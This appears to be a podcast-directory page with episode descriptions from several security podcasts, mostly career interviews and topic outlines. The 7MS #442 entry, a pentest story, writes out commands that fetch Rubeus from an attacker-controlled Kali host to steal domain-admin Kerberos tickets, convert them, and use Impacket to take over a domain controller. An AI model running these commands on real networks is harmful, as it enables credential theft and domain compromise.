Weekly Update 214
39 min

Getting the New iPhone 12 Pro; AmpliFi ALIEN; Trump on Passwords; On Trump’s Password; AmpliFi or UniFi; Sponsored by Varonis

https://www.troyhunt.com/weekly-update-214/

See omnystudio.com/listener for privacy information.

7 Minute Security
7 Minute Security
Brian Johnson
7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: * Great blue team tools alerting our customer to a lot of the stuff we were doing * An EDR that we tried to beat up (but it beat us up instead) * SharpGPOAbuse which we talked about extensively last week * Separation of "everyday" accounts from privileged accounts * Multi-factor authentication bypass! * Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!
1 hr 9 min
Hacker Valley Studio
Hacker Valley Studio
Hacker Valley Media
Episode 106 - Stacking the Deck of Success with AJ Yawn
In this episode of the Hacker Valley Studio podcast, hosts Ron and Chris interview AJ Yawn in an episode that is a mix between a master class and a founder’s journey. AJ is the founder and CEO of ByteCheck, with a personal and company goal to “make compliance suck less.” He is a cloud security expert, and brings to the conversation a wealth of wisdom on cybersecurity, leadership, and personal growth. The episode focuses on topics surrounding a major event in the past week for AJ and ByteChek, addressing AJ’s background, the work surrounding ByteCheck’s genesis, AJ’s thoughts on compliance, and more! The interview begins with a look at AJ’s background. AJ grew up a military brat, and eventually found himself in the Army for a time. While he did not place much consideration on technology before he entered the Army, it was during his Army career that AJ developed an interest in cybersecurity. He became passionate about cybersecurity and the cloud, and he went all in! After he left the service, he began a job in cybersecurity consulting, and he’s been in the field ever since. This episode is recorded at another momentous shift in AJ’s career, though, and Ron and Chris invite him to share about the past week, focusing on highs and lows. AJ shares about how he and his friend Jeff just launched ByteChek days ago, choosing as their launch date the significant holiday of Veterans Day! This choice was a way to honor AJ’s family members who served before him, and Ron and Chris also thank AJ for his own service to his country. In light of this exciting time, AJ explains what the early days of the company have been like and considers some influences that have shaped him. In this stage of his company, AJ has capitalized on LinkedIn. He had previously not been accustomed to using the site or to the more general task of business promotion, but he’s found that networking on LinkedIn is a great way to grow a new business. He also explores ways in which his background in sports and as a middle child among nine siblings have shaped him as a cybersecurity worker and entrepreneur. Such factors of his youth helped him to foster a growth mindset and competitive nature, and also taught him to stand in his power. Next, AJ talks about the thinking behind the tagline, “make compliance suck less,” which is honest, humorous, and relevant to the problem that drove AJ to start the company. As he navigates issues of business, compliance, and the like, AJ demonstrates remarkable capacities for focus. Ron and Chris wonder how he manages to focus on a single subject and to stay intentional for months or even years at a time, and AJ answers that he focuses on the process. In order to do so, he relies on the 90-91 model (which calls for the first 90 minutes of his day to be centered on a certain thing), as well as an array of goals. AJ is also deeply committed to an active pursuit of personal growth. One of the clearest demonstrations of this commitment came in the years leading up to the launch of ByteChek. AJ saw the need for such a company years ago and had it in mind to start his own company, knowing that he needed to take a chance to make the impact he wanted to make. However, he also knew that he was not yet ready to start a business, so he created a masterclass for himself to prepare. Since, in first forming the company, he needed to place special focus on learning the business and marketing side of things, his successful navigation of LinkedIn is just one testament to the effectiveness of his intentional training. Even in the midst of the fear surrounding the COVID-19 pandemic (and many problems for businesses), AJ was confident in betting on himself and launching ByteChek. And he’s confident in the future of the company, as well. He invests himself in making compliance exciting for clients, and among his projections for the future of compliance, he even includes plans for a ByteChek Academy! As the conversation reaches a close, AJ provides listeners with a final nugget of wisdom pertaining to the two most prominent themes of the conversation: betting on oneself and stepping into one’s personal power. 1:35 - This episode features AJ Yawn! 2:53 - AJ and his hosts turn to background info and what AJ is doing today. 4:35 - This past week has been huge for AJ because of his company launch! 6:33 - Did AJ’s interest in cybersecurity start while he was in the Army? 8:49 - The group speaks of AJ’s family background, including the fact that he is one of nine kids! 10:00 - Has being in the middle of a big family and playing sports shaped AJ? 12:52 - AJ and his hosts consider ByteChek’s tagline. 15:21 - How does AJ focus so well? 17:18 - Why did he launch the company now, even in the midst of COVID-19? 21:21 - AJ created a masterclass for himself. 25:38 - How does AJ make compliance exciting? 29:39- AJ is asked about the future of compliance. 33:45 - What’s one nugget of wisdom AJ can offer concerning two main themes of the episode? Links: Connect with AJ on LinkedIn. Learn more about Hacker Valley Studio. Support Hacker Valley Studio on Patreon. Follow Hacker Valley Studio on Twitter. Follow hosts Ron Eddings and Chris Cochran on Twitter. Learn more about ByteChek, and mention Hacker Valley Studio to receive a limited time offer!
39 min
Getting Into Infosec
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Lisa Jiggetts - From Navy Cook To Pentester To Non-Profit Founder!
Lisa Jiggetts knew from an early age that she was going to be in tech an cyber. A navy veteren who started off as a cook, she always found herself gravitating towards technology. She is also the Founder & Board of Director of Women’s Society of Cyberjutsu, a non-profit that is dedicated to increasing the opportunities and advancement for women in cybersecurity. Checkout her journey into the cybersecurity field.Notes * Originally a cook in the military, then migrated to information security. * Looked for opportunities to transition into information security by talking to people in and outside her social network. * Networking can be hard, but it will turn in your favor. * Lisa is an introvert, but know how to become an extrovert when needed.Quotes * "When you're starting out, you don't necessarily get into the area you want to be in—you got to work your way up." * “That's the biggest thing you can do. I think is networking because somebody knows somebody" * "So I got all these certifications… I read a book and pass. What is it to me personally? That didn't tell me, you know, how to do anything. They get you in the door" * "[Networking is] hard, but, just do it because in the end, it's gonna turn out in your favor."Links * Lisa on Twitter: https://twitter.com/lisajiggetts * Intro Music: https://trash80.com/#/content/133/weeklybeats-2012-week5 * Women’s Society of Cyberjutsu : https://womenscyberjutsu.org/Getting Into Infosec * Breaking IN: A Practical Guide to Starting a Career in Information Security: https://www.amazon.com/dp/B07N15GTPC/ * T-Shirts, Mugs, and more: https://gettingintoinfosec.com/shop/ * Stay in touch and sign up for sneak peaks, updates, and commentary: https://pages.gettingintoinfosec.com/subscribe * Ayman on Twitter: https://twitter.com/coffeewithayman
42 min
Cyber Work
Cyber Work
Infosec
Privileged access management and work-from-home tips
Today we’re talking cloud security and work-from-home. If you’ve ever checked your work email on your personal phone – I know you have, because we’ve all done it! – or touched up some time-sensitive spreadsheets on the same ipad your kids use to play Animal Crossing, Terence Jackson, Chief Information Security & Privacy Officer of Thycotic, is going to tell you how to tighten up your security protocols to ensure that work-from-home doesn’t become breach-from-home! – Enter code “cyberwork” to get 30 days of free training with Infosec Skills: https://www.infosecinstitute.com/skills/ – View transcripts and additional episodes: https://www.infosecinstitute.com/podcast With more than 17 years of public and private sector IT and security experience, Terence Jackson is responsible for protecting the company’s information assets. In his role, he currently leads a corporate-wide information risk management program. He identifies, evaluates and reports on information security practices, controls and risks in order to comply with regulatory requirements and to align with the risk posture of the enterprise. Prior to joining Thycotic, Terence was the Director of Cybersecurity and Professional Services for TSI, a Virginia based Inc. 5000 company. He has also worked as a Senior Security Consultant for Clango, Inc., a top Identity and Access Management (IAM) consultancy. He was featured in and also was a contributor to the book “Tribe of Hackers.” * About Infosec* Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.
50 min
Brakeing Down Security Podcast
Brakeing Down Security Podcast
Bryan Brake, Amanda Berlin, Brian Boettcher
2020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek - @FlUxIuS @penthertz Why we are here today? Software Defined Radio (sdr-radio.com) What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks? What other kinds of attacks can be launched? (I mean, other than replay type attacks) Door systems (badge systems) NFC? Contactless credit card attacks Smart building/home control systems Bluetooth attacks Point Of Sale systems Cellular radio 3g/4g/5g Industrial control systems Home appliances Medical telemetry systems Drones! LoRa - Wikipedia DASH7 - Wikipedia - custom TCP stack for LoRa Vehicle-to-grid - Wikipedia (V2G) Automatic Wireless Protocol Reverse Engineering | USENIX Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium Carrier Aggregation explained (3gpp.org) Mobile phone jammer - Wikipedia World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard Supply chain attacks - systems tend to use wireless chipsets or protocols LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas) Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need? Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io) Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations? Cellular? Zigbee? I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me? Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
32 min
The Social-Engineer Podcast
The Social-Engineer Podcast
Social-Engineer, LLC
Ep. 135 - Fear of video and snakes with Lisa Forte
In this episode, Chris Hadnagy and Maxie Reynolds are joined by social engineering and insider threats expert: Lisa Forte. Learn how Lisa went from fighting terrorists and real-life sea pirates to being an expert on cybercrime and social engineering. Discover how scammers are taking advantage of global uncertainty and understand how to protect yourself from attack. 00:00 – Introduction to Lisa Forte 02:38 – Lisa's path to a career in social engineering 05:27 – The psychology that terrorists use to recruit teenagers 07:52 – Lisa's experience with fighting cyber crime 08:43 – Why Lisa named her cyber security company “Red Goat” 10:23 – The world pandemic made hospitals and their supply chains vulnerable to attack 14:38 – Keep secure by realizing the value of the information you possess 15:41 - How Cyber Volunteers 19 is helping to save lives by making hospitals secure. (twitter) 21:25 – Ego suspension is a required skill for a good social engineer 25:47 – Find someone who gives you honest feedback 27:28 – How Chris deals with harsh criticism 30:27 – New documentary: “hacker:HUNTER Ha(ck)cine” (Part 1) (Part 2) 34:44 – Lisa's Vlog: “Rebooting” 35:44 – Lisa's and Chris’s experience with exposure therapy. 40:00 – How scammers take advantage of global uncertainty 42:37 – Law enforcement has a big disadvantage when fighting cyber crime 45:42: Lisa’s Contact info: LinkedIn Website Rebooting vlog with Chris Twitter 46:56 – Lisa's Book recommendation Prisoners Of Geography 50:20 – Outro Social-Engineer.com Social-Engineer.org The Human Hacking Conference The Innocent Lives Foundation Human Hacking Book Phishing As A Service® Trainings: Practical Open Source Intelligence For Everyday Social Engineers * 11-12 November 2020 - VIRTUAL Advanced Practical Social Engineering Training * 17-20 November, 2020 - VIRTUAL
53 min
Search
Clear search
Close search
Google apps
Main menu